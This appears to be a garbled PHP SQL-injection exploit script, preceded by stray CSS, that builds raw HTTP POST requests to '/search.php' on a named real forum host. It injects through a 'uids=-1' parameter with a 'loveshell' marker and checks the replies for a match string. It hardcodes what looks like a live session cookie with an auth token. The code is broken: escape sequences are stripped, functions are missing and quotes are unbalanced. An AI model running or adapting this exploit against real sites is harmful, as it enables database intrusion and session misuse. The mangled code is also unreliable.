body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
ini_set("max_execution_time",0);
error_reporting(7);
$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";
$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;
$mask='没有查找匹配的内容';
$count=0;
//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php/(.+)rn/ie',send(""),$php);echo$php[1];die();}
//$debug=1;
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."*rn";
$message .= "Accept-Language: zh-cnrn";
$message .= "Referer: http://".$server.$path."rn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "User-Agent: ".$useragent."rn";
$message .= "Host: ".$server."rn";
$message .= "Content-length: ".strlen($cmd)."rn";
$message .= "Connection: Keep-Alivern";
$message .= "cookie: ".$cookie."rn";
$message .= "rn";
$message .= $cmd."rn";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "
";";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>



